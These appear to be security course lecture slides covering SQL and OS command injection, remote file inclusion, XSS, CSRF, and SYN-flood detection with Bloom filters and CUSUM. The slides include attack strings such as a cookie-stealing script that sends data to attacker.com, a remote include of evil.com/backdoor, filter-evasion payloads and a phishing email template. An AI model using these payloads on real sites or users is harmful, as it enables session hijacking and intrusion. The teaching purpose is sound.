◼ Manipulate blocked strings
❑ ‘adm’| |’in’ (valid in Oracle)
◼ Use dynamic execution
❑ exec(‘select * from users’) works in MS-SQL
By-passing filters
◼ Exploit defective filters
❑ Example: Site defends by escaping any single
quotation mark
◼ I.e.: Replace ‘ with ‘’
❑ Assume that user field is limited to 20 characters
◼ Inject
❑ aaaaaaaaaaaaaaaaaaa’
◼ Application replaces this with
❑ aaaaaaaaaaaaaaaaaaa’’
◼ Passes it on to database, which shortens it to 20
characters, removing the final single quotation mark
◼ Therefore, inject
❑ aaaaaaaaaaaaaaaaaaa’ or 1=1 --
Second Order SQL Injection
◼ The result of one SQL statement is later used within another SQL statement
❑ Canonicalization is now much more difficult
Code Injection: OS Injection
◼ Two types:
❑ Characters ; | & newline are used to batch multiple commands
❑ The backtick character ` is used to encapsulate separate commands within a data item
◼ Use time delay errors
❑ Use ‘ping’ to the loop-back device
◼ | | ping -I 30 127.0.0.1 ; x | | ping -n 30 127.0.0.1 &
❑ works for both windows and linux in the absence
of filtering
OS Injection
◼ Dynamic execution in php
❑ uses eval
◼ Dynamic execution in asp
❑ uses evaluate
◼ Hacking steps to find injection attack:
❑ Try
◼ ;echo%2011111111
◼ echo%201111111
◼ response.write%201111111
◼ :response.write%201111111
❑ Look for a return of 1111111 or an error message
OS Injection
◼ Remote file injection
❑ PHP include accepts a remote file path
◼ Example Fault:
https://bobadilla.engr.scu.edu/main.php?Country=FRG
is processed as
❑ $country = $_GET[‘Country’];
❑ include( $country. ‘.php’ );
❑ which loads file: FRG.php
❑ Attacker injects
▪ https://bobadilla.engr.scu.edu/main.php?Country=http://evil.co
m/backdoor
◼ Found by putting attacker’s resources, or non-
existing IP, or static resource on victim’s site, …
Code Injection: other injection types
◼ Soap Injection
◼ XPath injection
◼ SMTP injection
◼ LDAP injection
Attacking other users: XSS
◼ XSS attacks
❑ Vulnerability has wide range of consequences,
from pretty harmless to complete loss of
ownership of a website
ATTACKING OTHER USERS:
CROSS-SITE SCRIPTING (XSS)
Reflected XSS
◼ User-input is reflected to web page
❑ Common vulnerability is reflection of input for an
error message
◼ Exploitation:
[Diagram: the attacker feeds a crafted URL to the user → the user logs in and requests the attacker’s URL → the server responds with the attacker’s JavaScript → the user’s browser sends the session token to the attacker → the attacker hijacks the user’s session]
Reflected XSS
◼ Exploit:
1. User logs on as normal and obtains a session cookie
2. Attacker feeds a URL to the user
◼ https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=n
ew+Image;+i.src=“http://attacker.com/”%2bddocument.cookie;</scr
ipt>
3. The user requests from the application the URL fed to them by
the attacker
4. The server responds to the user’s request; the answer contains
the javascript
5. User browser receives and executes the javascript
◼ var i = new Image; i.src=http://attacker.com/+document.cookie
6. Code causes the user’s browser to make a request to
attacker.com which contains the current session token
7. Attacker monitors requests to attacker.com and captures the
token in order to be able to perform arbitrary actions as the
user
Reflected XSS
◼ Same Origin Policy: Cookies are only returned to the site that set them.
❑ Same Origin Policy:
◼ Page residing in one domain can cause an arbitrary request to
be made to another domain.
◼ Page residing in one domain can load a script from another
domain and execute it in its own context
◼ A page residing in one domain cannot read or modify cookies
(or other DOM data) belonging to another domain
◼ For browser, the attacker’s javascript came from the
site
❑ It is executed within the context of the site
How to feed a tricky URL
From: Thomas Schwarz <tschwarz@bobadilla.engr.scu.edu>
To: John Doe
Subject: Complete online course feed-back form
Dear Valued Student
Please fill out the following online course feed-back form. Your grades
will not be released to the registrar without having completed this form.
Please go to my course website using your usual bookmark and then
click on the following link:
https://bobadilla.engr.scu.edu/%65%72%72%6f%72?message%3d%3c%
73%63%72ipt>var+i=ne%77+Im%61ge%3b+i.s%72c=“ht%74%70%3a%2f
Stored XSS Vulnerability
[Diagram: the attacker submits a question containing malicious JavaScript → the user logs in and views the attacker’s question → the server responds with the attacker’s JavaScript → the script executes in the user’s browser → the user’s browser sends the session token to the attacker → the attacker hijacks the user’s session]
DOM-based XSS
◼ A user requests a crafted URL supplied by the attacker and containing embedded Javascript
◼ The server’s response does not contain the
attacker’s script in any form
◼ When the user’s browser processes this
response, the script is nevertheless
executed.
The case of MySpace, 2005
◼ User Samy circumvented anti-XSS filters installed to
prevent users from placing JavaScript in their user profile
pages
◼ Script executed whenever user saw Samy’s page
❑ Added Samy into “friends” list
❑ Copied itself into the victim’s page
◼ MySpace had to take the application offline, remove
malicious script from the profiles of their users, and fix
the defect
◼ Samy was forced to pay restitution and carry out three
months of community service
XSS Payloads
◼ Virtual Defacement
❑ Content of host is not affected, but loaded from
other sites
◼ Injecting Trojan Functionality
❑ “Google is moving to a pay to play model” proof of
concept created by Jim Ley, 2004
◼ Inducing User Actions
❑ Use payload script to perform actions
◼ Exploit Any Trust Relationships
XSS Payloads
Other payloads for XSS
◼ Malicious web site succeeded in the past to:
❑ Log Keystrokes
❑ Capture Clipboard Contents
❑ Steal History and Search Queries
❑ Enumerate Currently Used Applications
❑ Port Scan the Local Network
❑ Attack Other Network Hosts
◼ <img src=http://192.168.1.1/hm_icon.gif”
onerror=“notNetgear()”
◼ This checks for the existence of a unique image that is
present if a Netgear DSL router is present
◼ And XSS can deliver those things, too
Delivery Modes
◼ Reflected and DOM-based XSS attacks
❑ Use forged email to target users
❑ Use text messages
❑ Use a “third party” web site to generate requests that
trigger XSS flaws.
◼ This is successful if the user is logged into the vulnerable
site and visits the “third party” web site at the same time.
◼ Attackers can pay for banner ads that link to a URL
containing an XSS payload for a vulnerable application
❑ Use the “tell a friend” or “tell administrator” functionality
in order to generate emails with arbitrary contents and
recipients
Delivery Modes
◼ Stored XSS attacks
❑ Look for user controllable data that is displayed:
◼ Personal information fields
◼ Names of documents, uploaded files, …
◼ Feedback or questions for admins
◼ Messages, comments, questions, …
◼ Anything that is recorded in application logs and
displayed in a browser to administrators:
❑ URLs, usernames, referer fields, user-agent field contents, …
Finding Vulnerabilities
◼ Standard proof-of-concept attack strings
“><script>alert(document.cookie)</script>
❑ String is submitted as every parameter to every page of the
application
◼ Rudimentary black-list filters
❑ Look for expressions like “<script>”, …
❑ Remove or encode expression, or block request altogether
❑ Counterattack:
◼ Use exploits without the <script> or even “ < > / characters
❑ Examples:
◼ “><script > alert(document.cookie)</script >
◼ “><ScRiPt>alert(document.cookie)</ScRiPt >
◼ “%3e%3cscript%3ealert(document.cookie)%3c/script%3e
◼ “><scr<script>ipt> alert(document.cookie)</scr</script>ipt>
◼ %00”>script>alert(document.cookie)</script>
Finding Reflected XSS Vulnerabilities
◼ Look for input string that is reflected back to user
❑ should be unique and easily searchable: “Crubbardtestoin”
❑ Submit test string as every parameter using every method, including
HTTP headers
◼ Review the HTML source code to identify the location of the
test string
◼ Change the test string to test for attack possibilities
❑ XSS bullets at ha.ckers.org
❑ Signature based filters (e.g. ASP.NET anti-XSS filters) will mangle
reflection for simple attack input, but
◼ Often overlook: whitespaces before or after tags, capitalized letters, only
match opened and closed tags,
❑ Data Sanitization
◼ Can remove certain expressions altogether, but then no longer check for
further vulnerabilities: <scr<script>ipt>
◼ Can be beaten by inserting NULL characters
◼ Escapes quotation characters with a backslash
❑ Use length filters that can be avoided by contracting JavaScripts
HTTP Only Cookies
◼ An application sets a cookie as HttpOnly
❑ Set-Cookie: SessId=124987389346541029; HttpOnly
◼ Supporting browsers will not allow client side
scripts to access the cookie
◼ This dismantles one of the methods for
session hijacking
Cross-Site Tracing
◼ Enables client-side scripts to circumvent the
HttpOnly protection
❑ Uses HTTP TRACE method
◼ used for diagnostics
◼ enabled by many web servers by default
❑ If server receives a request using the TRACE method,
➔ respond with a message whose body contains exactly the
same text of the trace request received by the server.
◼ Purpose is to allow seeing changes made by proxies, etc.
❑ Browsers submit all cookies in HTTP requests
including requests that are made with TRACE and
including cookies that are HttpOnly
Attacking other users: XSS
◼ Redirection Attacks
❑ Applications takes user-controllable input for redirection
◼ Circumvention of typical protection mechanisms
❑ Application checks whether user-supplied string starts with http:// and
then blocks the redirection or removes http://
◼ Tricks of the trade:
❑ Capitalize some of the letters in http
❑ Start with a null character (%00)
❑ Use a leading space
❑ Use double http
◼ Similar tricks when application checks whether url is in the same site as
application
❑ Application adds prefix http://bobadilla.engr.scu.edu to user input
◼ This is vulnerable if the prefix does not end with a ‘/’ character
HTTP Header Injection
◼ Application inserts user-controllable data into an HTTP header returned by the application
❑ Can be used to inject cookies
❑ Can be used to poison proxy server cache
Attacking other users: XSS
◼ Request Forgery - Session Riding
◼ On-Site Request Forgery OSRF
❑ Payload for XSS
❑ Vulnerability profile: Site allows users to submit
items viewed by others, but XSS might not be
feasible.
Example
◼ Message Board Application
◼ Messages are submitted with a request such as
POST /submit.php
Host: bobadilla.engr.scu.edu
Content-Length: 41
type=question&name=foo&message=bar
◼ Request results in
<tr> <td><img src=“/images/question.gif”></td>
<td>foo</td>
<td>bar</td></tr>
◼ Now change your request type to
type=../admin/newUser.php?username=foo&password=bar&role=admin#
◼ Request results in
<tr> <td><img src=“/images/
=../admin/newUser.php?username=foo&password=bar&role=admin#.gif”></td>
<td> </td>
<td> </td></tr>
◼ When an administrator is induced to issue this crafted request, the action is
performed
Attacking other users: XSS
◼ XSS Request Forgery (XSRF)
◼ Attacker creates website
❑ User’s browser submits a request directly to a vulnerable
application
❑ HTTP cookies are used to transmit session tokens.
◼ 2004 (D. Armstrong): visitors make automatic bids on an eBay auction
◼ Example:
❑ Find a function that performs some interesting action on behalf of
user and that has simple request parameters
POST TransferFunds.asp HTTP/1.1
Host: bobadilla.engr.scu.edu
FromAccount=current&ToSortCode=123456&ToAccountNumber=1234567&Amount=1000.
00&When=Now
❑ Create an HTML page that issues the request without any user
interaction
▪ For GET request, use an <img> tag with src set to the vulnerable URL
▪ For POST request, use a form with hidden forms
Denial of Service Attacks and
Solutions
Van Nguyen – HUT
Hanoi – 2010
Agenda
DOS Attack: Basic Concepts
SYN Flood Attack
Attack Source Detection
Traceback Solutions
Denial-Of-Service
◼ Flooding-based
◼ Send packets to victims
❑ Network resources
❑ System resources
◼ Traditional DOS
❑ One attacker
◼ Distributed DOS
❑ Countless attackers
DDoS
◼ A typical DDoS attack consists of
❑ Stealing partial control of a large number of hosts
❑ Secretly manipulating them to send dummy packets to jam a victim or/and its Internet connection
◼ Can be done in the following ways:
❑ Exploiting system design weaknesses
◼ e.g. ping of death
❑ Imposing computationally intensive tasks on the victim
◼ E.g. encryption and decryption
❑ Flooding-based DDoS attack
Attacks Reported
◼ May/June, 1998
❑ First primitive DDoS tools developed in the
underground:
◼ Small networks, only mildly worse than coordinated point-
to-point DoS attacks.
◼ August 17, 1999
❑ Attack on the University of Minnesota reported to
UW network operations and security teams.
◼ February 2000
❑ Attack on Yahoo, eBay, Amazon.com and other
popular websites.
◼ Once, more than 12,000 attacks during a
three week period.
Reference: http://staff.washington.edu/dittrich/misc/ddos/timeline.html
DDoS Attacks
◼ Do not necessarily rely on particular network protocols or system design weaknesses
◼ A major threat because of:
❑ availability of a number of user-friendly attack tools
❑ lack of effective solutions to defend against them
◼ The attacks can be classified into
❑ Direct Attacks
❑ Reflector Attacks
Direct Attacks
◼ A large number of packets sent directly towards a victim.
◼ Source addresses are usually spoofed
❑ the response goes elsewhere (or nowhere)
◼ Examples:
❑ TCP-SYN Flooding: the last message of TCP’s 3-way handshake never arrives from the source.
❑ Congesting a victim using ICMP messages, RST packets or UDP packets.
❑ Attack packets observed: TCP packets (94%), UDP packets (2%) and ICMP packets (2%).
Direct Attack
[Figure 1: direct attack architecture. Agent programs: Trinoo, Tribe Flood Network 2000, and Stacheldraht]
Reflector Attacks
◼ Uses innocent intermediary nodes (routers and servers) known as reflectors.
◼ An attacker sends packets that require responses to the reflectors, with the packets’ inscribed source address set to the victim’s address.
◼ Can be done using TCP, UDP, ICMP as well as RST packets.
◼ Examples:
❑ Smurf Attacks: the attacker sends ICMP echo requests to a subnet-directed broadcast address with the victim’s address as the source address.
❑ SYN-ACK flooding: reflectors respond with SYN-ACK packets to the victim’s address.
Reflector Attack
[Figure 1: reflector attack architecture]
◼ Cannot be observed by backscatter analysis, because victims do not send back any packets.
◼ Packets cannot be filtered as they are legitimate packets.
DDoS Attack Architectures
Some Reflector Attack Methods
Solutions to the DDoS Problems
◼ There are three lines of defense against the attack:
❑ Attack Prevention and Preemption (before the attack)
❑ Attack Detection and Filtering (during the attack)
❑ Attack Source Traceback and Identification (during and after the attack)
◼ A comprehensive solution should include all three lines of defense.
Attack Prevention and Preemption
◼ Protect hosts from master and agent implants:
❑ Using signatures and scanning procedures to detect them.
❑ Monitoring network traffic for known attack messages sent between attackers and masters.
◼ Using cyber-spies to intercept attack plans (e.g., a group of cooperating agents).
◼ Inadequate on its own, anyway.
Attack Source Traceback and Identification
◼ This is an after-the-fact measure
◼ IP Traceback: identifying the actual source of a packet without relying on its source information.
❑ Deploy routers to help: they can record information about packets they have seen.
◼ Routers can send additional information about seen packets to their destinations.
◼ Sometimes infeasible to use IP Traceback:
❑ Cannot always trace packets’ origins (NATs and firewalls!)
❑ Ineffective in reflector attacks.
❑ But helpful for post-attack law enforcement.
Attack Detection and Filtering
◼ Deployed in two phases:
❑ Attack Detection: identifying DDoS attack packets.
❑ Packet Filtering: classifying and dropping those packets.
◼ Effectiveness of Detection
❑ FPR (False Positive Ratio): no. of false positives / total number of confirmed normal packets
❑ FNR (False Negative Ratio): no. of false negatives / total number of confirmed attack packets
Both metrics should be low!
Attack Detection and Filtering
◼ Effectiveness of Filtering
❑ Effective attack detection DOES NOT IMPLY effective packet filtering
◼ The detection phase uses victim identities (address or port no.), so even normal packets with the same signatures can be dropped.
❑ NPSR (Normal Packet Survival Ratio): percentage of normal packets that can survive in the midst of an attack ➔ NPSR should be high!
Attack Detection and Filtering
Attack Detection and Filtering
◼ At Source Networks:
❑ One can filter packets based on address spoofing
❑ Direct attacks can be traced easily; reflector attacks are difficult
❑ Ensure all ISPs perform ingress packet filtering
◼ Filter out spoofed packets whose source IPs do not belong to the source network
◼ Very difficult to deploy this for all ISP (Impossible?)
◼ At the Victim’s Network:
❑ Victim can detect attack based on volume of incoming traffic or
degraded performance
◼ Commercial solutions available.
❑ Other mechanisms: IP Hopping
❑ Last Straw: If incoming link is jammed, victim has to shut down
and ask the upstream ISP to filter the packets.
Attack Detection and Filtering
◼ At a Victim’s Upstream ISP Network:
❑ Filter packets as asked by victim
❑ Can be automated by carefully designed intrusion alert systems
❑ Not a really good idea though
◼ Normal packets can still be dropped
◼ This upstream ISP network can still be jammed under large-scale attacks.
◼ At further Upstream ISP Networks:
❑ The above approach can be further extended to other
upstream networks.
❑ Effective only if ISP networks are willing to co-operate and
install packet filters.
An Internet Firewall
◼ A bipolar defense scheme cannot achieve both effective packet detection and packet filtering.
➔ deploy a global defense infrastructure. The plan is to detect attacks right at the Internet core!
◼ Two methods, which employ a set of distributed nodes in the Internet to perform attack detection and packet filtering:
❑ Route-based Packet Filtering Approach (RPF)
❑ Distributed Attack Detection Approach (DAD)
Route-Based Packet Filtering (RPF)
◼ Extends the idea of ingress packet filtering
❑ Using distributed packet filters to examine the
packets, based on addresses and BGP routing
information.
◼ A packet is considered an attack packet if it comes from an
unexpected link.

◼ Major Drawbacks
❑ BGP messages to carry the needed source addresses
➔ Overhead!
❑ Deployment is extremely demanding
◼ Once thought: Filters were to be placed in 1800 out of 10,000 ASs
◼ # ASs is continuously increasing.
❑ Can’t work against reflected packets.
Distributed Attack Detection (DAD)
◼ The idea is to deploys multiple Distributed Detection
Systems (DSs) to observe network anomalies and
misuses.
❑ Anomaly detection: Identifying traffic patterns that
significantly deviate from normal
◼ e.g., unusual traffic intensity for specific packet types.
❑ Misuse detection: Identifying traffic that matches a known
attack signature.
◼ DSs to exchange attack information from local
observations
❑ Statefull in respect to the DDoS attacks.
◼ It is still challenging to come up with an effective and deployable architecture
Distributed Attack Detection
DS Design Considerations
Two Hypotheses:
H1 – Presence of a DDoS attack
H0 – Null Hypothesis
Other considerations:
• Filters should be installed only on attack interfaces in the ‘CONFIRMED’ state
• All DSs should be connected ‘always’
• Each attack alert includes a ‘confidence level’
• Works in progress: Intrusion Detection Exchange Protocol, Intrusion Detection Message Exchange Format
SYN FLOOD DEFENSE
SOLUTIONS
TCP SYN-Flooding Attack
◼ TCP services are often susceptible to various types of DoS attacks
❑ SYN flood: external hosts attempt to overwhelm the server
machine by sending a constant stream of TCP connection
requests
◼ Streaming spoofed TCP SYNs
◼ Forcing the server to allocate resources for each new connection until all
resources are exhausted
❑ 90% of DoS attacks use TCP SYN floods
❑ Takes advantage of three way handshake
◼ Server start “half-open” connections
◼ These build up… until queue is full and all additional requests are blocked
TCP: Overview RFCs: 793, 1122, 1323, 2018, 2581
◼ point-to-point:
❑ one sender, one receiver
◼ reliable, in-order byte stream:
❑ no “message boundaries”
◼ pipelined:
❑ TCP congestion and flow control set window size
◼ send & receive buffers
◼ full duplex data:
❑ bi-directional data flow in same connection
❑ MSS: maximum segment size
◼ connection-oriented:
❑ handshaking (exchange of control msgs) init’s sender, receiver state before data exchange
◼ flow controlled:
❑ sender will not overwhelm receiver
[Figure: the application writes data into the sender’s socket send buffer; TCP segments carry it to the receiver’s receive buffer, from which the application reads data]
TCP segment structure
[Figure: TCP segment structure (32 bits wide): source port # | dest port #; sequence number; acknowledgement number; header length / unused / flag bits (URG, ACK, PSH, RST, SYN, FIN) / receive window; checksum / urgent data pointer; options (variable length); application data (variable length)]
Annotations: URG: urgent data (generally not used); ACK: ACK # valid; PSH: push data now (generally not used); RST, SYN, FIN: connection establishment (setup, teardown commands); sequence and acknowledgement numbers count by bytes of data (not segments!); receive window: # bytes receiver is willing to accept; Internet checksum (as in UDP)
Attack Mechanism
◼ Upon receiving a SYN segment, a Transmission Control Block (TCB) is reserved
◼ TCP SYN-RECEIVED state: the connection is half-open
❑ It transitions to ESTABLISHED only when the last ACK arrives
Attack Mechanism
◼ The attacker sends a flood of SYNs ➔ too many TCBs ➔ the host exhausts its memory.
◼ To avoid this, the OS only allows a fixed maximum number of TCBs in SYN-RECEIVED
◼ If this threshold is reached, newly arriving SYNs will be rejected
TCP Connection Management
Recall: TCP sender, receiver establish a “connection” before exchanging data segments
◼ initialize TCP variables:
❑ seq. #s
❑ buffers, flow control info (e.g. RcvWindow)
◼ client: connection initiator
◼ server: contacted by client
Three way handshake:
Step 1: client host sends TCP SYN segment to server
❑ specifies initial seq #
❑ no data
Step 2: server host receives SYN, replies with SYNACK segment
❑ server allocates buffers
❑ specifies server initial seq. #
Step 3: client receives SYNACK, replies with ACK segment, which may contain data
SYN Flooding
[Diagram: client C sends a stream of SYN segments (SYN_C1 … SYN_C5) to server S, which is listening and must store state for each half-open connection]
Implementation Method
How to create a successful flood
◼ Forcing drops of incomplete connections (ICs)
❑ Standard TCP: a connection times out only after some retransmissions ➔ 511 sec
❑ Assuming 1024 ICs are allowed per socket ➔ 2 connection attempts per second suffice to exhaust all allocated resources.
❑ Note that existing ICs are dropped when a new SYN request is received.
◼ If an ACK arrives at the server but does not find a corresponding IC state ➔ the server fails to establish the required connection
❑ Round-trip time (RTT): the time required for the server to receive the client’s reply
❑ Forcing the server to drop IC state at a rate faster than the RTT ➔ no connections are able to complete ➔ the attack succeeds!
◼ The goal of the attack is to recycle every connection before the average RTT
❑ For a listen queue size of 1024 and a 100 millisecond RTT ➔ need about 10,000 packets per second.
❑ A minimal-size TCP packet is 64 bytes, so the total bandwidth used is only about 5 Mb/second ➔ practical!
Firewall based Defense
◼ Examples: SYN Defender, SYN proxying
◼ Filters packets and requests before router
◼ Maintains state for each connection

◼ Drawbacks: can be overloaded, extra delay


for processing each packet
Server Based Defense
◼ Examples: SYN Cache, SYN cookies
◼ SYN cache:
❑ hash table, to partially store states,
❑ If the SYN-ACK is “acked” then the connection is
established with the server
◼ SYN cookies
❑ do not store state at the server but in the network
◼ Use a cryptographic function to encode all needed information into a value that is sent to the client with the SYN-ACK
◼ Upon receiving the final ACK, this value can be extracted and used as authentic proof of the source machine
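A minimal sketch of the SYN-cookie idea is shown below. It is illustrative only: real implementations pack the value (plus parameters such as an MSS index and a coarse time counter) into the 32-bit TCP initial sequence number, and the secret handling here is simplified.

# Minimal sketch of a SYN cookie: encode the connection 4-tuple and a coarse
# timestamp into a 32-bit value instead of storing a TCB per half-open connection.
import hashlib, hmac, os, time

SECRET = os.urandom(16)

def make_cookie(src_ip, src_port, dst_ip, dst_port, now=None):
    t = int(now if now is not None else time.time()) >> 6          # 64-second slots
    msg = f"{src_ip}:{src_port}-{dst_ip}:{dst_port}-{t}".encode()
    mac = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(mac[:4], "big")                           # 32-bit cookie (ISN)

def check_cookie(cookie, src_ip, src_port, dst_ip, dst_port):
    # Accept cookies minted in the current or the previous time slot.
    now = time.time()
    return any(make_cookie(src_ip, src_port, dst_ip, dst_port, now - d) == cookie
               for d in (0, 64))

c = make_cookie("10.0.0.7", 40000, "10.0.0.1", 80)
print(check_cookie(c, "10.0.0.7", 40000, "10.0.0.1", 80))   # True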
SYN kill
◼ Monitors the network
❑ If detects SYNs that are not being acked ➔
automatically generates RST packets to free
resources,
◼ also it classifies addresses as likely to be spoofed or
legitimate…
Problems with previous solutions
◼ Solutions such as SYN cookies, SYN cache, SYN Defender/SYN proxying, SYN kill
❑ Knew nothing of source
❑ Relied on “costly IP traceback”
❑ These solutions are “stateful” so they can be overwhelmed by SYN attacks
◼ 14,000 SYN/sec can overload them
Flood Detection System (FDS)
◼ Stateless, simple, edge (leaf) routers
◼ Utilize SYN-FIN pair behavior
◼ Can also use (SYN-ACK, FIN) pair behavior, so it works on either the client or the server side
◼ However, RST violates SYN-FIN behavior
◼ Placement: First/last mile leaf routers
❑ First mile – detect large DoS attacker
❑ Last mile – detect DDoS attacks that first mile
would miss
SYN – FIN Behavior
◼ Generally every SYN has a FIN
What to do about “RST”?
◼ We can’t tell whether an RST is active or passive
◼ Consider 75% active
◼ An active RST represents a SYN; a passive one does not
◼ Should balance out to be background noise
[Figure legend: RED – SYN, BLUE – FIN, BLACK – RST]
Statistical Attack Detection
◼ Very many SYNs are necessary to accomplish a DoS attack
◼ At least 500 SYN/sec
◼ 1400 SYN/sec can overwhelm a firewall
◼ 300,000 SYNs are necessary to shut down a server for 10 minutes
◼ So the SYN–FIN ratio should be very skewed during an attack
False Positive Possibilities
◼ Many new online users with long sessions
❑ More SYNs coming in than FINs
◼ A major server is down which would result
in 3 SYNs to a FIN
❑ Because clients would retransmit the SYN
CUSUM Algorithm
◼ Find the average number of FINs over a time period and test the observations for statistical homogeneity. If there are significant changes, find when they changed.
Detection
◼ The algorithm will result in zero for all normal activity and cumulatively track deviations (i.e. CUSUM = “cumulative sum”)
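A minimal sketch of this nonparametric CUSUM test, applied to the per-interval (SYN − FIN) difference. The drift allowance a and the alarm threshold h are illustrative constants, not values from the lecture; in practice they would be tuned from normal traffic.

# Minimal sketch of nonparametric CUSUM over the per-interval SYN-FIN difference.
# Under normal traffic the statistic hovers near zero; a sustained excess of SYNs
# over FINs accumulates until it crosses the alarm threshold h.
def cusum_detect(syn_fin_diffs, a=5.0, h=50.0):
    s = 0.0
    for t, d in enumerate(syn_fin_diffs):
        s = max(0.0, s + d - a)      # subtract the allowed drift, never go below 0
        if s > h:
            return t                 # index of the interval where the alarm fires
    return None

normal = [2, -1, 3, 0, 1] * 4
attack = normal + [40, 55, 60, 48]   # flood: SYNs far outnumber FINs
print(cusum_detect(normal))          # None
print(cusum_detect(attack))          # alarm fires within the flood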
Detection
◼ The internet can be quite dynamic and too
complicated for a parametric estimation, so
we use sequential testing which requires much
less computation
◼ Two aspects of detection:
❑ 1) False alarm time: the time without attacks
between unique false alarms
❑ 2) Detection time: the detection delay after the
attack starts.

◼ The goal is to minimize the second and maximize the first. However, the two goals conflict and require trade-offs
Performance Trends SYN-FIN
SYN attack vs Normal operation
Sensitivity of Detection
◼ 500 SYN/sec are required to shut down a server
◼ It takes a last-mile FDS 20 seconds to detect a 500 SYN/sec DDoS attack
• Once detected, SYN defender could be used to protect the victim
Detection is able to
◼ Distinguish between attacks and background noise
◼ Detect DDoS with last mile FDS
◼ Not effected by changes in overall traffic
◼ Detect attacks within seconds and implement
protection.
◼ Do you think this would always work?
◼ Can you think of any exceptions??
Midterm test
1. Describe the bit-commitment protocol using a hash function and explain the specific role of the random values used in the protocol. How could this protocol be extended to implement a fair “coin toss” between two parties connected online?
2. The Diffie-Hellman key exchange algorithm:
◼ Present the idea of the solution
◼ Present the algorithm with an illustrative example with q=23.
◼ Analyze the man-in-the-middle attack and describe a countermeasure
Detecting SYN-Flood
using Bloom Filters

SFD-BF
Idea
◼ Improving SFD: use a Bloom Filter to match FINs against SYNs with low error probability
❑ For each TCP packet we are interested in this 4-tuple: (source and destination IP, source and destination port) ➔ match each FIN against SYNs on this 4-tuple
Hash Function
• Input: x
• Output: H[x]
• Properties
– Each value of x maps to a value of H[x]
– Typically: Size of (x) >> Size of (H[x])
• Implementation
– XOR of bits, shifting, rotates, …
Bloom-Filter (BF)

◼ Bloom Filter uses k hash functions
Bloom-Filter (BF)
Querying a Bloom Filter
Optimal Parameters of a Bloom filter
• n: number of items to be stored
• k: number of hash functions
• m: the size of the bit array (memory)
• The false positive probability (at the optimal k) is f = (½)^k
• The optimal number of hash functions k is: k = ln2 × m/n ≈ 0.693 × m/n
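A minimal Bloom-filter sketch follows; the k positions are derived from two base hashes (a common implementation trick, not something prescribed by the lecture) and k is chosen with the formula above.

# Minimal Bloom filter sketch: m-bit array, k hash positions derived from two
# base hashes of a SHA-256 digest, with k chosen as 0.693 * m / n.
import hashlib
from math import log

class BloomFilter:
    def __init__(self, n_items, m_bits):
        self.m = m_bits
        self.k = max(1, round(log(2) * m_bits / n_items))
        self.bits = bytearray((m_bits + 7) // 8)

    def _positions(self, item: bytes):
        h = hashlib.sha256(item).digest()
        h1 = int.from_bytes(h[:8], "big")
        h2 = int.from_bytes(h[8:16], "big") | 1
        return [(h1 + i * h2) % self.m for i in range(self.k)]

    def add(self, item: bytes):
        for p in self._positions(item):
            self.bits[p // 8] |= 1 << (p % 8)

    def __contains__(self, item: bytes):
        return all(self.bits[p // 8] & (1 << (p % 8)) for p in self._positions(item))

bf = BloomFilter(n_items=1000, m_bits=16 * 1000)    # m/n = 16, as suggested below
bf.add(b"10.0.0.7:40000-10.0.0.1:80")
print(b"10.0.0.7:40000-10.0.0.1:80" in bf)          # True
print(b"10.0.0.9:1234-10.0.0.1:80" in bf)           # almost certainly False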
Counting Bloom Filters
◼ Extension: the array of m bits becomes an array of m small counters.
❑ When we insert or delete a value x from the BF, we simply increase or decrease the corresponding counters
Counting Bloom Filters
❑ For a small false positive probability, usually set m/n = 16 ➔ the false positive probability is at most 0.000459
❑ Also use counters of 8 bits.
❑ When the number of counters in use >= m/2 ➔ reset the BF to keep the false positive probability small
SFD-Method

1. Classification of packets
2. Computing the # of SYN and FIN packets going through
3. Using the CUSUM algorithm to analyze the (SYN, FIN) pair behaviour
SFD-BF Method
◼ Improvement on the previous SFD:
❑ Compute the difference between #SYN and #FIN only when the packets are matched on the 4-tuple:
◼ When a SYN packet comes, determine the corresponding 4-tuple and insert it into the BF, increasing the counters specified by this 4-tuple.
◼ When a FIN/RST packet comes, determine the 4-tuple and look up its hashes in the BF to decrease the corresponding counters
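A minimal sketch of this matching on top of a counting Bloom filter, reusing the double-hashing idea from the earlier sketch. Packet parsing is omitted and the 4-tuple values are illustrative.

# Minimal sketch: counting Bloom filter keyed on the TCP 4-tuple. SYN increments
# the counters, FIN/RST decrements them, so the aggregate count only grows for
# connections whose FIN never matches a previously seen SYN.
import hashlib

class SynFinCounter:
    def __init__(self, m=1 << 16, k=8):
        self.m, self.k = m, k
        self.counters = [0] * m
        self.pending = 0                         # aggregate SYN - matched FIN

    def _positions(self, four_tuple):
        h = hashlib.sha256(repr(four_tuple).encode()).digest()
        h1, h2 = int.from_bytes(h[:8], "big"), int.from_bytes(h[8:16], "big") | 1
        return [(h1 + i * h2) % self.m for i in range(self.k)]

    def on_syn(self, four_tuple):
        for p in self._positions(four_tuple):
            self.counters[p] += 1
        self.pending += 1

    def on_fin_or_rst(self, four_tuple):
        pos = self._positions(four_tuple)
        if all(self.counters[p] > 0 for p in pos):   # matched a previously seen SYN
            for p in pos:
                self.counters[p] -= 1
            self.pending -= 1

c = SynFinCounter()
c.on_syn(("10.0.0.7", 40000, "10.0.0.1", 80))
c.on_fin_or_rst(("10.0.0.7", 40000, "10.0.0.1", 80))
print(c.pending)    # 0 -- a completed connection leaves no residue for CUSUM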
Result
Result
Intentional Dropping Scheme
for SYN Flooding Mitigation
Idea
❑ Normally, if a client machine does not receive a SYN-ACK within a certain time after sending a SYN, it resends another SYN until it gets connected to the wanted server.
❑ The idea of this method is to drop the first SYN from every source machine, which helps to reduce a SYN flood, which usually consists of first SYNs with spoofed addresses
Method
◼ The solution proposes using 3 different BFs:
❑ BF1: stores the 4-tuple address of the first SYN coming from a given source
❑ BF2: stores the 4-tuples of all SYNs for which the 3-way handshake is already completed
❑ BF3: stores the 4-tuples of other SYNs.
Method
Once a SYN arrives, its 4-tuple address is checked against the 3 BFs, and one of the following cases occurs:
◼ 1. Not in any BF ➔ this is a first SYN; it is dropped, and the 4-tuple is inserted into BF1
◼ 2. If found in BF1 ➔ this is a second SYN; we just move the 4-tuple from BF1 to BF3
◼ 3. If in BF2 ➔ let it go through.
◼ 4. If in BF3 ➔ let it go through with probability p = 1/n, where n is the value of the corresponding counter in BF3
Method
When an ACK comes, its 4-tuple address is checked against the BFs, which results in one of 3 following cases:
1. Not in any BF ➔ drop the packet
2. If it matches one in BF2 ➔ let it through
3. If in BF3 ➔ the connection is completed ➔ move the 4-tuple address from BF3 to BF2
